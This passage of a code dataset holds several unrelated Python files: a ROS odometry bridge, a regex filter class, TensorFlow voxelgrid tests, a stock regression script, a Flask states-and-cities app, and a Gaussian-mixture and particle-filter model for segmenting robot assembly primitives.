3)))),\n                            numpy.hstack((numpy.zeros((3, 3)), d['X_angular_velocity_body_covariance'])),\n                        )).flatten(),\n                    ),\n                ))\n                odom_pub.publish(Odometry(\n                    header=Header(\n                        stamp=rospy.Time.from_sec(d['timestamp']*1e-9),\n                        frame_id='/enu',\n                    ),\n                    child_frame_id=child_frame_id,\n                    pose=PoseWithCovariance(\n                        pose=Pose(\n                            position=Point(*d['relative_position_enu']),\n                            orientation=Quaternion(**d['orientation_enu']),\n                        ),\n                        covariance=numpy.array(d['X_relative_position_orientation_enu_covariance']).flatten(),\n                    ),\n                    twist=TwistWithCovariance(\n                        twist=Twist(\n                            linear=Vector3(*d['velocity_body']),\n                            angular=Vector3(*d['angular_velocity_body']),\n                        ),\n                        covariance=numpy.vstack((\n                            numpy.hstack((d['X_velocity_body_covariance'], numpy.zeros((3, 3)))),\n                            numpy.hstack((numpy.zeros((3, 3)), d['X_angular_velocity_body_covariance'])),\n                        )).flatten(),\n                    ),\n                ))\n                clock_error_pub.publish(Float64(d['X_clock_error']))\n                tf_pub.publish(tfMessage(\n                    transforms=[\n                        TransformStamped(\n                            header=Header(\n                                stamp=rospy.Time.from_sec(d['timestamp']*1e-9),\n                                frame_id='/enu',\n                            ),\n                            child_frame_id=child_frame_id,\n                            
transform=Transform(\n translation=Point(*d['relative_position_enu']),\n rotation=Quaternion(**d['orientation_enu']),\n ),\n ),\n ],\n ))\n \n count += 1\n\nwhile True:\n try:\n go()\n except Exception:\n traceback.print_exc()\n time.sleep(1)\n","sub_path":"gnc/navigator_state_estimation/nodes/solution_ros_bridge.py","file_name":"solution_ros_bridge.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"159848337","text":"from itertools import product\n\nfrom preprocessing.prod.dict_parsers.GraphDictParser import GraphDictParser\nfrom preprocessing.prod.dict_parsers.BaseDictParser import BaseDictParser\n\ndict_parsers = {\n 'base': BaseDictParser,\n 'graph': GraphDictParser\n}\n\n\nclass BaseFilter:\n\n def __init__(self):\n self._beginning_separators = [\n self.construct_named_regex(name='begin',\n pattern=pattern,\n after_group_quantifier=quantifier,\n string_beginning=string_beginning)\n for pattern, string_beginning, quantifier in zip([r\"[\\s\\(]\", r\"[\\?!,\\.\\(\\)\\s]\"], [True, False], ['*', '+'])\n ]\n self._ending_separators = [\n self.construct_named_regex(name='end',\n pattern=r\"[\\?!,\\.\\(\\)\\s]\",\n after_group_quantifier=quantifier,\n string_ending=string_ending)\n for quantifier, string_ending in zip([\"*\", \"+\"], [True, False])\n ]\n self._pattern_dict = {}\n\n @staticmethod\n def construct_named_regex(name: str, pattern: str, after_group_quantifier: str='?',\n string_beginning=False, string_ending=False):\n string_b = '^' if string_beginning else ''\n string_e = '$' if string_ending else ''\n return r\"{}(?P<{}>{}){}{}\".format(string_b, name, pattern, after_group_quantifier, string_e)\n\n @staticmethod\n def _load_patterns_with_file(pattern_file, kind='base'):\n return dict_parsers[kind](pattern_file).get_dict()\n\n @staticmethod\n def _make_single_pattern_w_patterns(patterns):\n return '({})'.format('|'.join(['({})'.format(p) for p in patterns]))\n\n def _populate_pattern(self, pattern):\n \"\"\"embraces pattern with:\n 1. beginning of string & end of string\n 2. space & end of string\n 3. beginning of string & space\n 4. 
space & end of sentence\n \"\"\"\n return [begin + pattern + end for begin, end in product(self._beginning_separators, self._ending_separators)]","sub_path":"filters/BaseFilter.py","file_name":"BaseFilter.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"281622386","text":"from unittest import TestCase\n\nimport numpy as np\nimport tensorflow as tf\nfrom shape_completion_training.utils import tf_utils\nfrom shape_completion_training.voxelgrid.utils import inflate_voxelgrid\n\n\nclass TestUtils(TestCase):\n def test_geometric_mean(self):\n t = tf.convert_to_tensor([[1, 3, 9], [1, 1, 27.]])\n self.assertEqual(3, tf_utils.reduce_geometric_mean(t))\n\n def test_inflate_voxelgrid_by_one(self):\n vg_np = np.zeros((1, 13, 13, 13, 1), dtype=np.float32)\n vg_np[0, 7, 8, 11, 0] = 1.0\n vg = tf.constant(vg_np)\n inflated_vg = inflate_voxelgrid(vg)\n\n self.assertEqual(np.sum(inflated_vg), 27)\n\n for i in [6, 7, 8]:\n for j in [7, 8, 9]:\n for k in [10, 11, 12]:\n self.assertEqual(inflated_vg[0, i, j, k, 0], 1.0)\n","sub_path":"shape_completion_training/src/shape_completion_training/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"162830262","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 1 02:19:56 2019\n\n@author: ktjgu\n\"\"\"\n\nimport numpy as np\nfrom datetime import datetime\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom iexfinance.stocks import Stock\nfrom iexfinance.stocks import get_historical_data\n\nimport json\n\nwith open('config.json') as json_data_file:\n data = json.load(json_data_file)\n\ndef nlp():\n df2 = pd.read_csv(\"Combined_News_DJIA.csv\")\n print (df2)\n print (df2.sort_values(by=\"Date\", ascending=False))\n\niextoken = data[\"token\"]\n\nstart = datetime(2018, 10, 31)\nend = datetime.now()\n\ndf = get_historical_data(\"TXN\", start=start, end=end, output_format='pandas', token = iextoken)\nprint(df)\n\ndates = np.arange(df.shape[0])\nclose_vals = df['close'].values\nplt.plot(dates, close_vals)\n\nMat = np.zeros((len(dates), 2))\nMat[:, 0] = np.ones(len(dates))\nMat[:, 1] = dates\n\nmodel = LinearRegression().fit(Mat, close_vals)\ncoeffs = model.coef_\nintercept = model.intercept_\n\na = np.linspace(0, len(dates))\nb = model.intercept_ + coeffs[1]*a\nplt.plot(dates, close_vals, color ='b')\nplt.plot(a, b, color='r')","sub_path":"stock_predict_nlp_reg.py","file_name":"stock_predict_nlp_reg.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"504594018","text":"#!/usr/bin/python3\n\"\"\" starts a Flask web application \"\"\"\nfrom os import path, getenv\nfrom flask import Flask\nfrom flask import render_template\nfrom models import storage\nfrom models.state import State\n\napp = Flask(__name__)\napp.jinja_env.trim_blocks = True\napp.jinja_env.lstrip_blocks = True\n\n\n@app.route('/cities_by_states')\ndef cities_by_states():\n \"\"\" display all the states and the cities linked to \"\"\"\n return render_template(\n '8-cities_by_states.html',\n states=storage.all(State).values(),\n type_storage=getenv('HBNB_TYPE_STORAGE')\n )\n\n\n@app.teardown_appcontext\ndef teardown_appcontext(error):\n \"\"\" remove the current SQLAlchemy Session After each request \"\"\"\n 
storage.close()\n\nif __name__ == '__main__':\n    app.run(host=\"0.0.0.0\", port=5000, debug=True)\n","sub_path":"web_flask/8-cities_by_states.py","file_name":"8-cities_by_states.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"310586540","text":"\"\"\"======================================================================================\n    gmm_pipe.py\n    \n    Input: raw sensor data \n    Output: labelled sensor data and plots\n    \nLast update, Fall 2020\n======================================================================================\"\"\"\nimport imageio\nimport matplotlib.animation as ani\nimport matplotlib.cm as cmx\nimport matplotlib.colors as colors\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats\nimport enum\nimport sys\nimport bisect\nimport random\nimport collections\nimport os\n\nfrom matplotlib.patches import Ellipse\nfrom PIL import Image\nfrom sklearn import datasets\nfrom sklearn.cluster import KMeans\n\nfrom matplotlib.pyplot import figure, show\nfrom matplotlib.ticker import MaxNLocator\n\nfrom read_data import read_data1\nfrom plot_data import getlabels, plot_file, compute_success_rate\n\n\"\"\" --------------------------------------------------------------------------------------\n    Global Constants\n-----------------------------------------------------------------------------------------\"\"\"\nNUM_RUNS = 25  # the loops below process runs 1 through NUM_RUNS - 1\nn_primitives = 6\nnumIterTrain = 20\nnumIterTest = 20\nnumTMatrixUpdates = 1\n\n\"\"\" --------------------------------------------------------------------------------------\n    Utility Functions\n----------------------------------------------------------------------------------------\"\"\"\nclass Pr(enum.Enum): \n    \"\"\" \n    Enum associating each primitive with an integer \n    \"\"\"\n    none = 0\n    fsm = 1\n    align = 2\n    engage = 3\n    screw = 4\n    tighten = 5\n\ndef sample_primitive(p):\n    \"\"\" \n    Samples a primitive index from the categorical distribution p\n    Input:\n        p: (6,) numpy array representing the probability of each primitive\n    Output:\n        integer between 0-5 corresponding to the sampled primitive\n    \"\"\"\n    return bisect.bisect(np.cumsum(p), random.random())\n\ndef initializeTransitionMatrix2Identity():\n    T = np.eye(n_primitives)\n    return T\n\ndef initializeTransitionMatrix(final=False):\n    \"\"\" \n    Input:\n        final: flag -> False for Training, True for Testing\n    Output:\n        array of size (6,6) containing conditional probabilities: T[pr_i|pr_j]\n    \"\"\"\n    if final:\n        T = np.zeros((6,6)) # you can only move between specified primitives (more restrictive)\n    else:\n        T = np.ones((6,6)) # you can move from any primitive to any other\n    # \n    T[Pr.none.value, Pr.none.value] = 50\n    T[Pr.none.value, Pr.fsm.value] = 1\n    T[Pr.none.value, Pr.screw.value] = 1\n    # T[Pr.none.value, Pr.fsm.value] = 0.05\n    #\n    T[Pr.fsm.value, Pr.fsm.value] = 50\n    T[Pr.fsm.value, Pr.align.value] = 1\n    # T[Pr.fsm.value, Pr.none.value] = 0.05\n    #\n    # T[Pr.align.value, Pr.fsm.value] = 0.0\n    T[Pr.align.value, Pr.align.value] = 50\n    # T[Pr.align.value, Pr.screw.value] = 0\n    T[Pr.align.value, Pr.engage.value] = 1\n    #\n    T[Pr.engage.value, Pr.engage.value] = 50\n    T[Pr.engage.value, Pr.none.value] = 1\n    T[Pr.engage.value, Pr.screw.value] = 1\n    # T[Pr.engage.value, Pr.tighten.value] = 0\n    # T[Pr.engage.value, Pr.screw.value] = 0.1\n    \n    # T[Pr.screw.value, Pr.none.value] = 0.5\n    T[Pr.screw.value, Pr.screw.value] = 50\n    T[Pr.screw.value, 
Pr.none.value] = 1\n T[Pr.screw.value, Pr.tighten.value] = 1\n # T[Pr.screw.value, Pr.engage.value] = 0\n # T[Pr.screw.value, Pr.align.value] = 0\n\n T[Pr.tighten.value, Pr.tighten.value] = 50\n T[Pr.tighten.value, Pr.none.value] = 1\n # T[Pr.tighten.value, Pr.screw.value] = 0\n\n # scale values so they are all probabilities between 0-1\n T = np.transpose(T.transpose() / np.sum(T,axis=1))\n return T\n\ndef updateTransitionMatrix(currentNumUpdates):\n \"\"\" \n It reads the likelihood_run#.txt files\n\n Input:\n integer reprsenting the number of times the transition matrix has been updated \n Output:\n array of size (6,6) containing conditional probabilities: T[pr_i|pr_j]\n \"\"\"\n \n #if updatedT already existed from another run, just add them up and then divide by the number of runs\n T = np.zeros((6,6))\n Tnew = np.zeros((6,6))\n actualNumRuns = 0 \n\n for i in range(1, NUM_RUNS):\n # number of runs: 1-19 but missing 11 and 16 was shit\n if i == 11 or i == 16:\n continue\n \n actualNumRuns += 1\n\n # Read data\n likelihoodsFile=\"results/run{0:d}_likelihoods_T{1:d}\".format(i,currentNumUpdates)\n likelihoods = np.genfromtxt(likelihoodsFile)\n likelihoods = likelihoods[:,1:] #the first column is just time stamps\n\n # ------- Compute matrix entries\n # Find index of maximum value in each row of likelihoods. This index will match the primitive. \n primitivesSequence = np.argmax(likelihoods, axis=1)\n\n for j in range(primitivesSequence.shape[0] - 1):\n Tnew[primitivesSequence[j], primitivesSequence[j+1]] += 1\n\n # Add T matrices from each run and scale values so they are all probabilities between 0-1\n Tnew = np.transpose(Tnew.transpose() / np.sum(Tnew,axis=1))\n T = T + Tnew\n \n T = T/actualNumRuns\n\n return T\n\ndef initializeConstraints():\n myConstraints=[()]*n_primitives\n myConstraints[Pr.none.value] = (\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_x'], 0.0, -1.0),\n (var_idxs['ang_vel_y'], 0.0, -1.0),\n (var_idxs['ang_vel_z'], 0.0, -1.0),\n (var_idxs['F_x'], 0.0, -1.0),\n (var_idxs['F_y'], 0.0, -1.0),\n (var_idxs['F_z'], 0.0, -1.0),\n (var_idxs['M_x'], 0.0, -1.0),\n (var_idxs['M_y'], 0.0, -1.0),\n (var_idxs['M_z'], 0.0, -1.0),\n )\n myConstraints[Pr.fsm.value] = (\n (var_idxs['M_x'], 0.0, -1.0),\n (var_idxs['M_y'], 0.0, -1.0),\n (var_idxs['M_z'], 0.0, -1.0)\n )\n myConstraints[Pr.align.value] = (\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_z'], 0.0, 0.5),\n )\n myConstraints[Pr.engage.value] = (\n (var_idxs['ori_x'], 0.0, 0.5),\n (var_idxs['ori_y'], 0.0, 0.5),\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_x'], 0.0, -1.0),\n (var_idxs['ang_vel_y'], 0.0, -1.0)\n )\n myConstraints[Pr.screw.value] = (\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_x'], 0.0, -1.0),\n (var_idxs['ang_vel_y'], 0.0, -1.0),\n )\n myConstraints[Pr.tighten.value] = (\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_x'], 0.0, -1.0),\n (var_idxs['ang_vel_y'], 0.0, -1.0),\n (var_idxs['ang_vel_z'], 0.0, 0.5)\n )\n return myConstraints\n\ndef mixWithIdentity(T,alpha):\n return alpha*np.eye(T.shape[0]) + (1 - alpha)*T\n\ndef forward_model_primitive(s_value, T):\n #s is a primitve idx\n #T is the transition matrix\n return 
sample_primitive(T[s_value])\n\ndef gaussian(X, mu, cov):\n return scipy.stats.multivariate_normal.pdf(X, mean=mu, cov=cov)\n\ndef mix_mean_covar_pi(mean,covar,pi,mean0,covar0,pi0,k):\n np.save(mean, np.load(mean)*(1 - k) + k*np.load(mean0))\n np.save(covar, np.load(covar)*(1 - k) + k*np.load(covar0))\n np.save(pi, np.load(pi)*(1 - k) + k*np.load(pi0))\n\ndef createFileNames(run_number, currentNumTupdates):\n likelihoods_fileName = \"results/run{0:d}_likelihoods_T{1:d}\".format(run_number, currentNumTupdates)\n tlabels_fileName = \"results/run{0:d}_tlabels_T{1:d}\".format(run_number, currentNumTupdates)\n prmlabels_fileName = \"results/run{0:d}_prmlabels_T{1:d}\".format(run_number, currentNumTupdates)\n manual_tlabels = \"../data/pipe/raw_pipe/run{0:d}_tlabels\".format(run_number)\n manual_prmlabels = \"../data/pipe/raw_pipe/run{0:d}_prmlabels\".format(run_number)\n success_fileName = \"results/run{0:d}_successRates\".format(run_number)\n failureFile = \"results/run{0:d}_failures_T{1:d}\".format(run_number, currentNumTupdates)\n return likelihoods_fileName, tlabels_fileName, prmlabels_fileName, manual_tlabels, manual_prmlabels, success_fileName, failureFile\n\ndef createSuccessRateFile(run_number, currentNumTupdates):\n \"\"\"\n Saves the success rates for a give run\n Each row corresponds to an updated transition matrix\n \"\"\"\n successRate_fileName = \"results/run{0:d}_successRates\".format(run_number)\n successRate_file = open(successRate_fileName,\"w\")\n successRate_file.write(\"Tmatrix # \\t SuccessRate\\n\")\n successRate_file.close()\n\ndef saveSuccessRateFile(fileName, successRate, currentNumTupdates):\n successRate_file = open(fileName,\"a\")\n successRate_file.write((\"{:d} \\t\\t\\t {:.4e}\\n\").format(currentNumTupdates, successRate))\n successRate_file.close()\n\n\"\"\" --------------------------------------------------------------------------------------\n Gaussian Mixture Model Class \n-----------------------------------------------------------------------------------------\"\"\"\nclass GMM:\n def __init__(self, X, offset=0.0):\n self.X = X;\n self.epoch = 0;\n self.offset = offset\n \n def initialize_clusters(self, n_clusters, constraints=None, means0=None, cov0=None):\n \"\"\"\n Each cluster is a primitive\n \"\"\"\n self.clusters = []\n self.n_clusters = n_clusters\n idx = np.arange(X.shape[0])\n \n # We could use the KMeans centroids to initialise the GMM\n # Or we can prescribe them\n if means0 is not None:\n if means0.shape[0] != n_clusters or means0.shape[1] != self.X.shape[1]:\n print(\"means not the correct shape\")\n exit()\n mu_k = means0;\n else:\n kmeans = KMeans().fit(X)\n mu_k = kmeans.cluster_centers_\n if constraints is not None:\n self.constraints = True\n else:\n self.constraints = False\n\n self.likelihoods = np.zeros((X.shape[0], n_clusters))\n for i in range(n_clusters):\n if cov0 is not None:\n cov_k = cov0[i]\n else:\n cov_k = np.identity(self.X.shape[1], dtype=np.float64)\n self.clusters.append({\n 'pi_k': 1.0 / n_clusters,\n 'mu_k': mu_k[i],\n 'cov_k': cov_k\n })\n self.likelihoods[:,i] = 1.0/n_clusters\n if self.constraints:\n self.clusters[i]['constraint_k'] = constraints[i]\n return self.clusters\n \n def initialize_clusters_from_savedfiles(self, n_clusters, meanfile,covfile,pifile, constraints=None):\n \"\"\"\n Each cluster is a primitive\n \"\"\"\n self.clusters = []\n self.n_clusters = n_clusters\n mu_k = np.load(meanfile)\n cov_k = np.load(covfile)\n pi_k = np.load(pifile)\n if constraints is not None:\n self.constraints = True\n else:\n 
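# A single Markov step in the style of forward_model_primitive/sample_primitive
# above: row s of the transition matrix is the categorical distribution over
# the next primitive (toy 3-state matrix, illustrative values only):
import bisect
import random
import numpy as np

T_toy = np.array([[0.9, 0.05, 0.05], [0.1, 0.8, 0.1], [0.0, 0.2, 0.8]])
s = 0
s_next = bisect.bisect(np.cumsum(T_toy[s]), random.random())  # inverse-CDF draw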
self.constraints = False\n self.likelihoods = np.zeros((X.shape[0], n_clusters))\n for i in range(n_clusters):\n self.clusters.append({\n 'pi_k': pi_k[i],\n 'mu_k': mu_k[i],\n 'cov_k': 2.0*cov_k[i]\n })\n if self.constraints:\n self.clusters[i]['constraint_k'] = constraints[i]\n return self.clusters\n\n def inflate_cov(self, factor):#each cluster is a primitive\n for cluster in self.clusters:\n cluster['cov_k'] = factor*cluster['cov_k']\n\n def expectation_step(self,run_number, t=None, saveFigure = None, saveFile=None,T_matrix_APF=None, T_matrix_standard=None):\n \"\"\"\n - Output: computes p(belong to primitive | X) for each X\n It saves these likelihoods to a .txt\n - Uses: a particle filter with a heuristic forward model: T(sn | sn-1) \n \"\"\"\n plotFlag = t is not None and saveFigure is not None\n if plotFlag:\n f,ax = plt.subplots(1)\n if T_matrix_APF is not None:\n self.apf_expectation(T_matrix_APF) #the option that worked best\n elif T_matrix_standard is not None:\n self.forward_backward_expectation(T_matrix_standard)\n else:\n self.standard_expectation()\n if plotFlag:\n for kk, cluster in enumerate(self.clusters):\n ax.plot(t,cluster['gamma_nk'],label=Pr(kk))\n if plotFlag:\n ax.legend()\n ax.set_title(\"Primitive Probabilities Run{0:d}\".format(run_number))\n plt.savefig(saveFigure, dpi=600)\n plt.close()\n # plt.show()\n self.epoch += 1\n # Save likelihoods to txt file:\n if saveFile is not None:\n likelihoods = np.zeros((len(t), self.n_clusters + 1))\n likelihoods[:,0] = t\n for kk, cluster in enumerate(self.clusters):\n likelihoods[:,kk+1] = cluster['gamma_nk']\n np.savetxt(saveFile, likelihoods)\n \n def standard_expectation(self):\n totals = np.zeros(self.X.shape[0], dtype=np.float64)\n for kk, cluster in enumerate(self.clusters):\n gamma_nk = (cluster['pi_k'] * gaussian(self.X, cluster['mu_k'], cluster['cov_k'])).astype(np.float64)\n totals += gamma_nk\n cluster['gamma_nk'] = gamma_nk \n self.totals = totals\n for kk, cluster in enumerate(self.clusters):\n for i in range(len(totals)):\n if totals[i] == 0.0:\n cluster['gamma_nk'][i] = 1.0 / self.n_clusters\n totals[i] = 1e-300\n else:\n cluster['gamma_nk'][i] /= totals[i];\n self.likelihoods[:,kk] = cluster['gamma_nk']\n\n def forward_backward_expectation(self,T_matrix):\n N = self.X.shape[0]\n alpha = np.zeros((self.n_clusters, N))\n beta = np.zeros((self.n_clusters, N))\n p_obs = np.zeros((self.n_clusters, N)) + self.offset\n for k, cluster in enumerate(self.clusters):\n p_obs[k,:] = gaussian(self.X, cluster['mu_k'], cluster['cov_k']).astype(np.float64)\n alpha[k,0] = 1.0/self.n_clusters*p_obs[k,0]#gaussian(self.X[0], cluster['mu_k'], cluster['cov_k']).astype(np.float64)\n beta[k,-1] = 1.0\n alpha[:,0] = alpha[:,0] / np.sum(alpha[:,0])\n for t in range(1,N):\n for k1 in range(self.n_clusters):\n for k0 in range(self.n_clusters):\n alpha[k1, t] += alpha[k0, t-1]*T_matrix[k0, k1]\n alpha[k1,t] *= p_obs[k1,t]#gaussian(self.X[t+1], cluster1['mu_k'], cluster1['cov_k']).astype(np.float64)\n alpha[:,t] = alpha[:,t] / np.sum(alpha[:,t])\n for t in range(N - 2, -1, -1):\n for k0 in range(self.n_clusters):\n for k1 in range(self.n_clusters):\n beta[k0, t] += beta[k1,t+1] * T_matrix[k0, k1] * p_obs[k1, t+1]#gaussian(self.X[t+1], cluster1['mu_k'], cluster1['cov_k']).astype(np.float64)\n beta[:,t] = beta[:,t] / np.sum(beta[:,t])\n self.totals = np.zeros(N)\n for k, cluster in enumerate(self.clusters):\n cluster['gamma_nk'] = alpha[k,:]*beta[k,:]\n self.totals += cluster['gamma_nk']\n for k, cluster in enumerate(self.clusters):\n 
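# A minimal forward-backward pass on a 2-state toy chain, mirroring the
# alpha/beta recursions of forward_backward_expectation (numbers illustrative):
import numpy as np

T = np.array([[0.9, 0.1], [0.2, 0.8]])                  # transition probabilities
p_obs = np.array([[0.8, 0.3, 0.4], [0.2, 0.7, 0.6]])    # p(x_t | state) for 3 steps
alpha = np.zeros((2, 3))
beta = np.ones((2, 3))
alpha[:, 0] = 0.5 * p_obs[:, 0]                         # uniform prior times likelihood
for t in range(1, 3):
    alpha[:, t] = p_obs[:, t] * (T.T @ alpha[:, t - 1])
for t in range(1, -1, -1):
    beta[:, t] = T @ (p_obs[:, t + 1] * beta[:, t + 1])
gamma = alpha * beta
gamma /= gamma.sum(axis=0)                              # smoothed posteriors, like gamma_nk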
cluster['gamma_nk'] /= self.totals\n        self.offset = max(self.offset*0.5, 0.1)\n        \n    def pf_expectation(self,T_forward):\n        \"\"\" \n        Input:\n            observations: states Starting from T=1\n            pose_0: (4,4) numpy arrays, starting pose\n        Output:\n            p_primitives (N x n_primitives probability array)\n        \"\"\"\n        N = self.X.shape[0]\n        likelihoods = np.zeros((self.X.shape[0], self.n_clusters))\n        self.totals = np.zeros(self.X.shape[0])\n        for kk, cluster in enumerate(self.clusters):\n            likelihoods[0,kk] = (cluster['pi_k'] * gaussian(self.X[0], cluster['mu_k'], cluster['cov_k'])).astype(np.float64)\n        self.totals[0] = np.sum(likelihoods[0,:])\n        likelihoods[0,:] /= np.sum(likelihoods[0,:])\n        N_particles = 100\n        #store primitives as integers\n        s = np.zeros((N_particles,N),dtype=int)\n        for i in range(N_particles):\n            s[i,0] = sample_primitive(likelihoods[0])\n        weights = np.ones(N_particles)\n        ps = np.zeros(self.n_clusters)\n        for t in range(N-1):\n            for kk, cluster in enumerate(self.clusters):\n                ps[kk] = (cluster['pi_k'] * gaussian(self.X[t+1], cluster['mu_k'], cluster['cov_k'])).astype(np.float64)\n            for i in range(N_particles):\n                s[i,t+1]=forward_model_primitive(s[i,t],T_forward)\n                weights[i] = ps[s[i,t+1]]\n            #normalize weights\n            weights = weights / np.sum(weights)\n            #resample\n            rand_offset = np.random.rand()\n            cumweights = np.cumsum(weights)\n            averageweight = cumweights[-1]/N_particles\n            n_particles_allocated = 0\n            for i, cumweight in enumerate(cumweights):\n                n = int(np.floor(cumweight / averageweight - rand_offset)) + 1 #n particles that need to be allocated\n                # print(n_particles_allocated, n)\n                for particle in range(n_particles_allocated, n):\n                    s[particle,t+1] = s[i,t+1]\n                n_particles_allocated = n\n            #count primitives\n            temp = collections.Counter(s[:,t+1])\n            for kk in range(self.n_clusters):\n                likelihoods[t+1, kk] = temp[kk]/N_particles\n            self.totals[t+1] = np.sum(ps)\n        for kk, cluster in enumerate(self.clusters):\n            cluster['gamma_nk'] = likelihoods[:,kk]\n\n    def apf_expectation(self,T_forward):\n        \"\"\" \n        auxiliary particle filter: https://people.maths.bris.ac.uk/~manpw/apf_chapter.pdf\n        Input:\n            observations: states Starting from T=1\n            pose_0: (4,4) numpy arrays, starting pose\n        Output:\n            p_primitives (N x n_primitives probability array)\n        \"\"\"\n        N = self.X.shape[0]\n        likelihoods = np.zeros((self.X.shape[0], self.n_clusters))\n        self.totals = np.zeros(self.X.shape[0])\n        for kk, cluster in enumerate(self.clusters):\n            likelihoods[0,kk] = (cluster['pi_k'] * gaussian(self.X[0], cluster['mu_k'], cluster['cov_k'])).astype(np.float64)\n        self.totals[0] = np.sum(likelihoods[0,:])\n        likelihoods[0,0] = 1e10  # pin the filter so every path starts in the 'none' primitive\n        likelihoods[0,:] /= np.sum(likelihoods[0,:])\n        N_particles = 100\n        #store primitives as integers\n        s = np.zeros((N_particles,N),dtype=int)\n        for i in range(N_particles):\n            s[i,0] = sample_primitive(likelihoods[0])\n        weights = np.ones(N_particles)\n        alpha = np.zeros(N_particles)\n        ps = np.zeros(self.n_clusters)\n        p_x1_for_s1 = np.zeros(self.n_clusters)\n        for t in range(N-1):\n            for s1, cluster1 in enumerate(self.clusters):\n                p_x1_for_s1[s1] = (gaussian(self.X[t+1], cluster1['mu_k'], cluster1['cov_k'])).astype(np.float64)\n            for s0, cluster0 in enumerate(self.clusters):\n                ps[s0] = 0.0\n                for s1, cluster1 in enumerate(self.clusters):\n                    ps[s0] += T_forward[s0,s1]*(p_x1_for_s1[s1] + self.offset)\n            # print(\"t: {0:f}, ps\".format(t), ps)\n            for i in range(N_particles):\n                weights[i] = ps[s[i,t]]\n            self.totals[t+1] = np.max(weights)\n            #normalize weights\n            weights = weights / np.sum(weights)\n            #resample\n            rand_offset = np.random.rand()\n
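# The resampling loops above implement systematic (low-variance) resampling;
# the same step in isolation, on toy weights (independent of the GMM class):
import numpy as np

weights = np.array([0.1, 0.2, 0.4, 0.3])
N_p = len(weights)
positions = (np.arange(N_p) + np.random.rand()) / N_p      # one jittered comb of N_p points
indices = np.searchsorted(np.cumsum(weights), positions)   # particle picked per comb tooth
# each index is drawn in proportion to its weight, in O(N_p) with a single random number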
            cumweights = np.cumsum(weights)\n            averageweight = cumweights[-1]/N_particles\n            n_particles_allocated = 0\n            for i, cumweight in enumerate(cumweights):\n                n = int(np.floor(cumweight / averageweight - rand_offset)) + 1 #n particles that need to be allocated\n                for particle in range(n_particles_allocated, n):\n                    s[particle,t] = s[i,t]\n                    alpha[particle] = alpha[i]\n                n_particles_allocated = n\n            #finished resample\n            for i in range(N_particles):\n                s[i,t+1]=forward_model_primitive(s[i,t],mixWithIdentity(T_forward,alpha[i]))\n            #count primitives\n            temp = collections.Counter(s[:,t])\n            for kk in range(self.n_clusters):\n                likelihoods[t, kk] = temp[kk]/N_particles\n        self.totals[0] = self.totals[1]\n        temp = collections.Counter(s[:,-1])\n        for kk, cluster in enumerate(self.clusters):\n            likelihoods[-1,kk] = temp[kk]/N_particles\n            cluster['gamma_nk'] = likelihoods[:,kk]\n        self.offset = max(self.offset*0.5, 0.1)\n\n    def maximization_step(self):\n        \"\"\"\n        Gaussian: p ( X| s , mu , cov ) \n        Optimize mu , cov max likelihood\n        Heuristic constraints on mu , cov\n        \"\"\"\n        N = float(self.X.shape[0])\n        \n        for kk, cluster in enumerate(self.clusters):\n            gamma_nk = cluster['gamma_nk']\n            cov_k = np.zeros((self.X.shape[1], self.X.shape[1]))\n            \n            N_k = np.sum(gamma_nk, axis=0) #sum over all the data\n            \n            pi_k = N_k / N #weights based on total sums\n            mu_k = np.sum(np.tile(gamma_nk,(self.X.shape[1],1)).transpose() * self.X, axis=0) / N_k #means are a weighted sum based on expectation\n            if self.constraints:\n                for constraint in cluster['constraint_k']:\n                    if constraint[0] > -1: #constraint[0] = -1 is used for inactive constraints\n                        mu_k[constraint[0]] = constraint[1]\n            for j in range(self.X.shape[0]):\n                diff = (self.X[j] - mu_k).reshape(-1, 1)\n                cov_k += gamma_nk[j] * np.dot(diff, diff.T)\n            if self.constraints:\n                for constraint in cluster['constraint_k']:\n                    if constraint[0] > -1: #constraint[0] = -1 is used for inactive constraints\n                        if constraint[2] > 0: # covar constraint active:\n                            scalefactor = constraint[2]/np.sqrt(cov_k[constraint[0],constraint[0]])\n                            if scalefactor < 1:\n                                cov_k[constraint[0],:] = scalefactor*cov_k[constraint[0],:]\n                                cov_k[:,constraint[0]] = scalefactor*cov_k[:,constraint[0]]\n\n            cov_k /= N_k\n            \n            cluster['pi_k'] = pi_k\n            cluster['mu_k'] = mu_k\n            cluster['cov_k'] = cov_k\n\n    def get_likelihood(self):\n        sample_likelihoods = np.log(self.totals)\n        return np.sum(sample_likelihoods)\n\n    def save(self, meanfile, covarfile, pifile):\n        \"\"\"\n        Save binaries\n        \"\"\"\n        mu0 = np.zeros((self.n_clusters,self.X.shape[1]))\n        cov0 = np.zeros((self.n_clusters,self.X.shape[1],self.X.shape[1]))\n        pi0 = np.zeros(self.n_clusters)\n        for kk, cluster in enumerate(self.clusters):\n            mu0[kk] = cluster['mu_k']\n            cov0[kk] = cluster['cov_k']\n            